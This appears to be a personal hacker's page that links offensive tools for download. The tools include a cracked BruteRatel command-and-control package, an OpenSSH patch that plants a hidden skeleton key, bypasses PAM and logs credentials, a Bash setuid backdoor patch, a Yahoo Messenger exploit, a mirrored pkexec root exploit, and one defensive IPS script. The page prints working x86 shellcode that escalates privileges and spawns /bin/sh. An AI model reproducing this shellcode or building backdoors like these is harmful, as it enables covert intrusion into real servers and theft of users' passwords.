|
Recent Misc
|
| ■ |
Remember Wargames of the 2000 era?
Play here. There are a series of levels (4 as of writing) that will lead you to being able to get root on a server. Every level will have clues to help you with the next. Have fun!
|
| ■ |
Post Exploitation Framework
BruteRatel-1.2.2-Cracked.zip is a customised command and control center for Red Team and Adversary Simulation. Documentation is here.
|
| ■ |
IPS
Grepinator is a firewall wrapper for ipset and iptables that uses pre-defined filters
to comb through log files and match on patterns that may indicate an attempt at hacking, bruteforcing or enumeration of a server.
|
| ■ |
Backdoor
OpenSSH-8.4-backdoor.patch
is a patch I wrote for the most recent version of OpenSSH (8.4 Portable as of
writing). This patch adds a hardcoded skeleton key to the ssh daemon. A
few bonuses include:
No connection traces in the log files
Usernames and passwords both in and out are logged - currently not enabled
PAM bypass
Security through obscurity? Logging of usernames and passwords can be
routed to /dev/null when deemed an invasion of privacy. Alternativley
use it to recover passwords of a compromised system.
|
| ■ |
Shellcode
set-loop.c - will find the highest UID to setuid(). Most services will run as non-root, so something generic was called for.
char shellcode[] =
"\x31\xdb\x31\xc9\x31\xc0\xb0\x17\xcd\x80\x3d\xff\xff\xff\xff"
"\x72\x04\x43\x41\xeb\xef\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24"
"\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80";
|
| ■ |
Script
Obfuscator -is a bash script- is a bash script obfuscator. Obfuscation (or beclouding)
is the hiding
of intended meaning in communication, making communication confusing,
wilfully ambiguous, and harder to interpret. Anyone with half a brain
cell can reverse this obfuscation, but it was better than
plaintext for its intended purpose.
|
| ■ |
OLD Wargames
BishII
was one of the first multi-shellcode & multi-platform eggshell
loaders back in mid 2000's.
|
| ■ |
Exploit (golden oldie)
YahPoo.c
was an exploit I wrote for a vulnerbility I found in the Yahoo Messenger Windows application over a decade ago. This was the first exploit I sold to Verisign (formerly IDefence).
This vulnerbility affected MILLIONS of Yahoo Messenger clients worldwide and with the right shellcode
allowed an attacker to install a backdoor on any Windows machine of that era (XP/2k).
|
| ■ |
Backdoor
Bash-4.2.patch
is a patch to chmod a 'file' 4775 should a certain 'condition' exist.
This tool/backdoor was used to regain root access in a King of the hill style wargame. See patch for more info.
|
| ■ |
Documents
A bit of light reading...
|
| ■ |
Mirror
blasty-vs-pkexec.c Download the Local root exploit - mirrored - Original can be found at https://haxx.in
|